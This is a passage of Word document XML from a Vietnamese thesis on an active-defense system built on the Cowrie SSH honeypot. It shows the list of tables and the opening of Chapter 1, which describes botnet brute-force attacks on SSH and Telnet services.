          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Bảng 0.3: Danh mục bảng biểu dữ liệu</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:jc w:val="center"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:bottom w:val="single" w:sz="8" w:space="0" w:color="1E293B"/>
          <w:left w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="single" w:sz="4" w:space="0" w:color="CBD5E1"/>
          <w:insideV w:val="single" w:sz="4" w:space="0" w:color="E2E8F0"/>
        </w:tblBorders>
        <w:tblCellMar>
          <w:top w:w="120" w:type="dxa"/>
          <w:bottom w:w="120" w:type="dxa"/>
          <w:left w:w="160" w:type="dxa"/>
          <w:right w:w="160" w:type="dxa"/>
        </w:tblCellMar>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
        <w:gridCol w:w="3134"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Ký hiệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tên bảng dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="1E293B"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:i w:val="0"/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Trang</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 0.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng giải nghĩa các thuật ngữ viết tắt trong đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 0.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Danh mục các hình vẽ và biểu đồ trong đồ án</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 0.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Danh mục bảng biểu dữ liệu</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 1.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>So sánh sự khác biệt giữa Triển khai Ứng dụng Bề nổi và Hệ thống Active Defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 2.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ma trận so sánh các dòng Honeypot phổ biến (Dionaea, Cowrie, Conpot, Glastopf)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>So sánh khía cạnh Pháp lý và Kỹ thuật: Hack-back vs Active Defense (MITRE Engage)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng ánh xạ các Sự kiện Cowrie sang Ma trận Kỹ thuật MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 4.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Danh sách các Module mã nguồn và Trách nhiệm xử lý trong Hệ sinh thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>30</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 5.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Tổng hợp kết quả kiểm thử 4 kịch bản tấn công Red Team giả lập</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng đo lường hiệu năng và mức tiêu thụ tài nguyên phần cứng hệ thống</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>37</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Bảng 5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Top 10 Quốc gia và Dải mạng phát sinh lưu lượng tấn công SSH nhiều nhất</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3134"/>
            <w:shd w:fill="F8FAFC"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:i w:val="0"/>
                <w:color w:val="1F2937"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>39</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="120" w:line="312" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="312" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="003366"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>CHƯƠNG 1: TỔNG QUAN VÀ ĐẶT VẤN ĐỀ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="240" w:after="120" w:line="312" w:lineRule="auto"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="142850"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>1.1 Bối cảnh An ninh mạng và Thực trạng Tấn công Dịch vụ Truy cập từ xa (SSH/Telnet)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Trong kỷ nguyên chuyển đổi số và bùng nổ hạ tầng điện toán đám mây (Cloud Computing), dịch vụ Secure Shell (SSH) và Telnet đóng vai trò là xương sống trong việc quản trị, cấu hình và vận hành hệ thống từ xa của hàng triệu máy chủ, thiết bị mạng và hệ thống IoT trên toàn thế giới. Do cổng mặc định TCP 22 (SSH) và TCP 23 (Telnet) bắt buộc phải mở công khai để phục vụ nhu cầu quản trị từ xa, đây luôn là mục tiêu hàng đầu bị các mạng máy tính ma (Botnet) và các nhóm tội phạm mạng nhắm đến để thực hiện các chiến dịch xâm nhập ban đầu (Initial Access).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Theo các báo cáo an ninh mạng toàn cầu gần đây của các hãng bảo mật lớn như Fortinet, Palo Alto Networks và Microsoft Threat Intelligence, hơn 85% tổng lưu lượng rà quét trái phép trên Internet hướng về các cổng quản trị từ xa. Các cuộc tấn công này diễn ra với tốc độ chóng mặt và hoàn toàn tự động, được điều khiển bởi các biến thể mã độc botnet nguy hiểm như Mirai, Gafgyt, Tsunami hay Muhstik. Những botnet này liên tục thực hiện chiến dịch dò quét địa chỉ IP toàn cầu (IP Sweeping) và thực hiện tấn công dò quét từ điển (Dictionary Brute Force) với hàng ngàn cặp tài khoản/mật khẩu phổ biến nhằm chiếm quyền điều khiển (root compromise) của máy chủ mục tiêu.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto" w:after="120"/>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1E1E1E"/>
          <w:sz w:val="26"/>
        </w:rPr>
